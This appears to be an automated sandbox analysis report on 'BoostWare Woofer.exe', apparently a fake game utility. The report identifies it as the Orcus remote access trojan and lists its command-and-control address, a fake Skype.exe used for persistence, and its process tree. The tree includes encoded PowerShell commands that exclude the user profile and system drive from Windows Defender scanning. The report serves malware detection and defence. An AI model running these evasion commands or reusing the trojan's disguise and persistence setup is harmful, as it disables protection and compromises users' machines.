orcus | 6929f40d7bd70ce7e5189f9c940767d1d4426bcadd66828d1298ca96ffa44eb2

Analysis

max time kernel
148s
max time network
149s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
28/02/2025, 10:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BoostWare Woofer.exe
Size

10.0MB
MD5

7a0de259284a750bc1b9e489a3c549ee
SHA1

8bd17616907d5adf94489d2d6c833c55425148d0
SHA256

6929f40d7bd70ce7e5189f9c940767d1d4426bcadd66828d1298ca96ffa44eb2
SHA512

8c0a47f0ed7a1d30e8a5de563debac0753eac29db92445c9b14cdb905a09a6a34d7adbdbdacae774ee962cfc6f6a5f357ed71931b488b8f174a3fa99134c3704
SSDEEP

196608:stDsBPeJ5EHWb/I0onV2TNRXbUgoL8aA0TO3e5bau5Zcx:0xAE/IJ2TNugUHNyu5M

Score

10^/10

orcus fortnite defense_evasion discovery persistence rat spyware stealer

Malware Config

Extracted

Family

orcus

Botnet

Fortnite

82.9.246.24:8808

Mutex

f65beca88ddb49089d3a6be2931bc598

Attributes

autostart_method
Registry
enable_keylogger
false
install_path
%programfiles%\Microsoft\Skype.exe
reconnect_delay
10000
registry_keyname
Skype
taskscheduler_taskname
Orcus
watchdog_path
AppData\Skype.exe

Signatures

Orcus
Orcus is a Remote Access Trojan that is being sold on underground forums.
rat spyware stealer orcus
Orcus family
orcus

Orcurs Rat Executable 3 IoCs

resource	yara_rule
behavioral1/files/0x0007000000016eb8-26.dat	orcus
behavioral1/memory/2804-33-0x0000000000110000-0x000000000040C000-memory.dmp	orcus
behavioral1/memory/2728-61-0x00000000013A0000-0x000000000169C000-memory.dmp	orcus

Executes dropped EXE 21 IoCs

pid	Process
2308	BoostWare.exe
2696	perm spoofer.exe
2748	Beta.exe
2804	Rha4t.exe
396	WindowsInput.exe
2000	WindowsInput.exe
2728	Skype.exe
2704	Skype.exe
1800	Skype.exe
1196	Skype.exe
2460	Skype.exe
2668	Skype.exe
2316	Skype.exe
1932	Skype.exe
2484	Skype.exe
1044	Skype.exe
308	Skype.exe
2200	Skype.exe
1544	Skype.exe
2176	Skype.exe
944	Skype.exe

Loads dropped DLL 10 IoCs

pid	Process
2592	BoostWare Woofer.exe
2592	BoostWare Woofer.exe
2308	BoostWare.exe
2352	Process not Found
2308	BoostWare.exe
2584	WerFault.exe
2584	WerFault.exe
2584	WerFault.exe
2584	WerFault.exe
2584	WerFault.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Skype = "\"C:\\Program Files\\Microsoft\\Skype.exe\""	Skype.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\WindowsInput.exe	Rha4t.exe
File created	C:\Windows\SysWOW64\WindowsInput.exe.config	Rha4t.exe
File created	C:\Windows\SysWOW64\WindowsInput.InstallState	WindowsInput.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\Microsoft\Skype.exe	Rha4t.exe
File opened for modification	C:\Program Files\Microsoft\Skype.exe	Rha4t.exe
File created	C:\Program Files\Microsoft\Skype.exe.config	Rha4t.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2584	2696	WerFault.exe	34

System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Skype.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Skype.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BoostWare.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Skype.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Skype.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Skype.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Skype.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BoostWare Woofer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Skype.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Skype.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Skype.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	perm spoofer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Skype.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Skype.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Skype.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Skype.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Modifies Internet Explorer settings 1 TTPs 39 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FA15AE31-F5C5-11EF-A045-62CAC36041A9} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d051fac7d289db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000382cdaffef5ef47bd22c342a2e35762000000000200000000001066000000010000200000000a44e2320798802fd510e2dcdd0ab7a6f30aa6b5d416706041c53a1b3f7d2143000000000e8000000002000020000000be912eb8434cdaa24499f439c5576379f74aae501082af015112b7f955d8b0ff20000000f8c0883f1cfcba0376e6594346488492d21c9616a761203ade54307e1551056a400000009016081dbccddfb92ef23bd30134a9f7b654fc7487190293876c28a390d39c408323262f2d38bca92f39567f29bc229c8ff67d2ad5eacbcc1f6941fb48abb7f0	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000382cdaffef5ef47bd22c342a2e35762000000000200000000001066000000010000200000005d343abfc9661904bae2858a9a137a7021b498e5cda89a4b25cfe71fa3ebaf2e000000000e80000000020000200000004c6bc86d5c352775680772aae9759595e6612a2a5f363d094c2a5b641361487490000000b763826ad0b42d0164833e5bd06c23e58f6dcb04be822471eedd37dbfa1b58926ffa42decc2e74a08f1f09ae4b749cdd01b61e8cb8226a748ce280094e56362fe63668e584040eb332f01e65e9d5234a75a80107da072841f26c3ff776f5f19b6d05437c14649c2361ad3b3a40829c0dd835a955cebabcb30ac4f54870d5404dc8b6afdaee17362e515f9ea5775274f740000000e1a52f02494014ac62b6744ebe18ff30ae36be0c9d04160b47ff41881323030005a669c3bf3452b25bad59eb0190009fede86d44f477927f904371fb693eae71	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446903479"	iexplore.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3008	powershell.exe
1944	powershell.exe
2728	Skype.exe
2728	Skype.exe
2728	Skype.exe
2728	Skype.exe
2728	Skype.exe
2728	Skype.exe
2728	Skype.exe
2728	Skype.exe
2192	iexplore.exe
2728	Skype.exe
2728	Skype.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2728	Skype.exe
2728	Skype.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2728	Skype.exe
2728	Skype.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2728	Skype.exe
2728	Skype.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2728	Skype.exe
2728	Skype.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2728	Skype.exe
2728	Skype.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2192	iexplore.exe
2728	Skype.exe
2728	Skype.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	2728	Skype.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2192	iexplore.exe

Suspicious use of SetWindowsHookEx 44 IoCs

pid	Process
2192	iexplore.exe
2192	iexplore.exe
900	IEXPLORE.EXE
900	IEXPLORE.EXE
1616	IEXPLORE.EXE
1616	IEXPLORE.EXE
1828	IEXPLORE.EXE
1828	IEXPLORE.EXE
1828	IEXPLORE.EXE
1828	IEXPLORE.EXE
1116	IEXPLORE.EXE
1116	IEXPLORE.EXE
1116	IEXPLORE.EXE
1116	IEXPLORE.EXE
800	IEXPLORE.EXE
800	IEXPLORE.EXE
800	IEXPLORE.EXE
800	IEXPLORE.EXE
900	IEXPLORE.EXE
900	IEXPLORE.EXE
900	IEXPLORE.EXE
900	IEXPLORE.EXE
1616	IEXPLORE.EXE
1616	IEXPLORE.EXE
1616	IEXPLORE.EXE
1616	IEXPLORE.EXE
2824	IEXPLORE.EXE
2824	IEXPLORE.EXE
2824	IEXPLORE.EXE
2824	IEXPLORE.EXE
2536	IEXPLORE.EXE
2536	IEXPLORE.EXE
2536	IEXPLORE.EXE
2536	IEXPLORE.EXE
1828	IEXPLORE.EXE
1828	IEXPLORE.EXE
1828	IEXPLORE.EXE
1828	IEXPLORE.EXE
1116	IEXPLORE.EXE
1116	IEXPLORE.EXE
1116	IEXPLORE.EXE
1116	IEXPLORE.EXE
1656	IEXPLORE.EXE
1656	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2592 wrote to memory of 3008	2592	BoostWare Woofer.exe	31
PID 2592 wrote to memory of 3008	2592	BoostWare Woofer.exe	31
PID 2592 wrote to memory of 3008	2592	BoostWare Woofer.exe	31
PID 2592 wrote to memory of 3008	2592	BoostWare Woofer.exe	31
PID 2592 wrote to memory of 2308	2592	BoostWare Woofer.exe	33
PID 2592 wrote to memory of 2308	2592	BoostWare Woofer.exe	33
PID 2592 wrote to memory of 2308	2592	BoostWare Woofer.exe	33
PID 2592 wrote to memory of 2308	2592	BoostWare Woofer.exe	33
PID 2592 wrote to memory of 2696	2592	BoostWare Woofer.exe	34
PID 2592 wrote to memory of 2696	2592	BoostWare Woofer.exe	34
PID 2592 wrote to memory of 2696	2592	BoostWare Woofer.exe	34
PID 2592 wrote to memory of 2696	2592	BoostWare Woofer.exe	34
PID 2308 wrote to memory of 1944	2308	BoostWare.exe	35
PID 2308 wrote to memory of 1944	2308	BoostWare.exe	35
PID 2308 wrote to memory of 1944	2308	BoostWare.exe	35
PID 2308 wrote to memory of 1944	2308	BoostWare.exe	35
PID 2308 wrote to memory of 2748	2308	BoostWare.exe	37
PID 2308 wrote to memory of 2748	2308	BoostWare.exe	37
PID 2308 wrote to memory of 2748	2308	BoostWare.exe	37
PID 2308 wrote to memory of 2748	2308	BoostWare.exe	37
PID 2308 wrote to memory of 2804	2308	BoostWare.exe	39
PID 2308 wrote to memory of 2804	2308	BoostWare.exe	39
PID 2308 wrote to memory of 2804	2308	BoostWare.exe	39
PID 2308 wrote to memory of 2804	2308	BoostWare.exe	39
PID 2696 wrote to memory of 2584	2696	perm spoofer.exe	40
PID 2696 wrote to memory of 2584	2696	perm spoofer.exe	40
PID 2696 wrote to memory of 2584	2696	perm spoofer.exe	40
PID 2696 wrote to memory of 2584	2696	perm spoofer.exe	40
PID 2804 wrote to memory of 396	2804	Rha4t.exe	41
PID 2804 wrote to memory of 396	2804	Rha4t.exe	41
PID 2804 wrote to memory of 396	2804	Rha4t.exe	41
PID 2804 wrote to memory of 2728	2804	Rha4t.exe	43
PID 2804 wrote to memory of 2728	2804	Rha4t.exe	43
PID 2804 wrote to memory of 2728	2804	Rha4t.exe	43
PID 2728 wrote to memory of 2704	2728	Skype.exe	45
PID 2728 wrote to memory of 2704	2728	Skype.exe	45
PID 2728 wrote to memory of 2704	2728	Skype.exe	45
PID 2728 wrote to memory of 2704	2728	Skype.exe	45
PID 496 wrote to memory of 1800	496	taskeng.exe	46
PID 496 wrote to memory of 1800	496	taskeng.exe	46
PID 496 wrote to memory of 1800	496	taskeng.exe	46
PID 2704 wrote to memory of 2192	2704	Skype.exe	47
PID 2704 wrote to memory of 2192	2704	Skype.exe	47
PID 2704 wrote to memory of 2192	2704	Skype.exe	47
PID 2704 wrote to memory of 2192	2704	Skype.exe	47
PID 2192 wrote to memory of 900	2192	iexplore.exe	48
PID 2192 wrote to memory of 900	2192	iexplore.exe	48
PID 2192 wrote to memory of 900	2192	iexplore.exe	48
PID 2192 wrote to memory of 900	2192	iexplore.exe	48
PID 2728 wrote to memory of 1196	2728	Skype.exe	49
PID 2728 wrote to memory of 1196	2728	Skype.exe	49
PID 2728 wrote to memory of 1196	2728	Skype.exe	49
PID 2728 wrote to memory of 1196	2728	Skype.exe	49
PID 2192 wrote to memory of 1616	2192	iexplore.exe	51
PID 2192 wrote to memory of 1616	2192	iexplore.exe	51
PID 2192 wrote to memory of 1616	2192	iexplore.exe	51
PID 2192 wrote to memory of 1616	2192	iexplore.exe	51
PID 2728 wrote to memory of 2460	2728	Skype.exe	52
PID 2728 wrote to memory of 2460	2728	Skype.exe	52
PID 2728 wrote to memory of 2460	2728	Skype.exe	52
PID 2728 wrote to memory of 2460	2728	Skype.exe	52
PID 2192 wrote to memory of 1828	2192	iexplore.exe	53
PID 2192 wrote to memory of 1828	2192	iexplore.exe	53
PID 2192 wrote to memory of 1828	2192	iexplore.exe	53

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\BoostWare Woofer.exe
"C:\Users\Admin\AppData\Local\Temp\BoostWare Woofer.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2592
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZwBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAZABiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAcAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbABrACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3008
- C:\Users\Admin\AppData\Local\Temp\BoostWare.exe
  "C:\Users\Admin\AppData\Local\Temp\BoostWare.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2308
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAbAByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAagBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAdQBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZABrACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1944
- - C:\Users\Admin\AppData\Local\Temp\Beta.exe
    "C:\Users\Admin\AppData\Local\Temp\Beta.exe"
    3⤵
    - Executes dropped EXE
    PID:2748
- - C:\Users\Admin\AppData\Local\Temp\Rha4t.exe
    "C:\Users\Admin\AppData\Local\Temp\Rha4t.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:2804
  - - C:\Windows\SysWOW64\WindowsInput.exe
      "C:\Windows\SysWOW64\WindowsInput.exe" --install
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      PID:396
  - - C:\Program Files\Microsoft\Skype.exe
      "C:\Program Files\Microsoft\Skype.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2728
    - - C:\Users\Admin\AppData\Roaming\Skype.exe
        
        "C:\Users\Admin\AppData\Roaming\Skype.exe" /launchSelfAndExit "C:\Program Files\Microsoft\Skype.exe" 2728 /protectFile
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2704
      - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch&plcid=0x409&o1=.NETFramework,Version=v4.8&processName=Skype.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0
        6⤵
        Modifies Internet Explorer settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2192
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2192 CREDAT:275457 /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:900
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2192 CREDAT:275461 /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1616
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2192 CREDAT:472078 /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1828
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2192 CREDAT:472086 /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1116
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2192 CREDAT:734227 /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:800
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2192 CREDAT:406604 /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2824
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2192 CREDAT:1061916 /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2536
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2192 CREDAT:1258564 /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1656
    - - C:\Users\Admin\AppData\Roaming\Skype.exe
        
        "C:\Users\Admin\AppData\Roaming\Skype.exe" /launchSelfAndExit "C:\Program Files\Microsoft\Skype.exe" 2728 /protectFile
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1196
    - - C:\Users\Admin\AppData\Roaming\Skype.exe
        
        "C:\Users\Admin\AppData\Roaming\Skype.exe" /launchSelfAndExit "C:\Program Files\Microsoft\Skype.exe" 2728 /protectFile
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2460
    - - C:\Users\Admin\AppData\Roaming\Skype.exe
        
        "C:\Users\Admin\AppData\Roaming\Skype.exe" /launchSelfAndExit "C:\Program Files\Microsoft\Skype.exe" 2728 /protectFile
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2668
    - - C:\Users\Admin\AppData\Roaming\Skype.exe
        
        "C:\Users\Admin\AppData\Roaming\Skype.exe" /launchSelfAndExit "C:\Program Files\Microsoft\Skype.exe" 2728 /protectFile
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2316
    - - C:\Users\Admin\AppData\Roaming\Skype.exe
        
        "C:\Users\Admin\AppData\Roaming\Skype.exe" /launchSelfAndExit "C:\Program Files\Microsoft\Skype.exe" 2728 /protectFile
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1932
    - - C:\Users\Admin\AppData\Roaming\Skype.exe
        
        "C:\Users\Admin\AppData\Roaming\Skype.exe" /launchSelfAndExit "C:\Program Files\Microsoft\Skype.exe" 2728 /protectFile
        5⤵
        Executes dropped EXE
